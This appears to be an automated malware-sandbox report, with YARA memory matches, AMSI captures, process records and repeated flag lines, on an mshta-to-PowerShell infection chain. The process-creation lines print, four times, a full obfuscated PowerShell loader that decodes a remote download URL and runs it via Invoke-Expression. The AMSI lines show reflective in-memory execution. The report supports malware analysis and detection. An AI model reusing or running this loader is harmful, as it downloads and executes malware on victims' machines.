Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match	File source: 00000005.00000002.1528395675.000000000CC71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1518186939.000000000585C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1732568845.000000000557B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1527620417.0000000008620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tapmost)$global:Lnligst = [System.Text.Encoding]::ASCII.GetString($Trkkenaalen)$global:Wairs=$Lnligst.substring(309815,28440)<#Lyrikere frihandelen Extraclassroom Premeridian Ip #>$E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Skumsprjtene $Erindringer $Skillevggene), (Spisehuses @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fyrreaarsfdselsdagenes = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vaskomatens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Retssikkerhed, $false).DefineType($Maximus, $
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tapmost)$global:Lnligst = [System.Text.Encoding]::ASCII.GetString($Trkkenaalen)$global:Wairs=$Lnligst.substring(309815,28440)<#Lyrikere frihandelen Extraclassroom Premeridian Ip #>$E

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00CB33D2 push esp; retf		1_2_00CB33F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00CB3458 push eax; iretd		1_2_00CB3471
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00CB3A64 push ebx; retf		1_2_00CB3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_06E208C2 push eax; mov dword ptr [esp], ecx		1_2_06E20AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248ACAF3 push esp; retf		17_2_248ACAF5

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
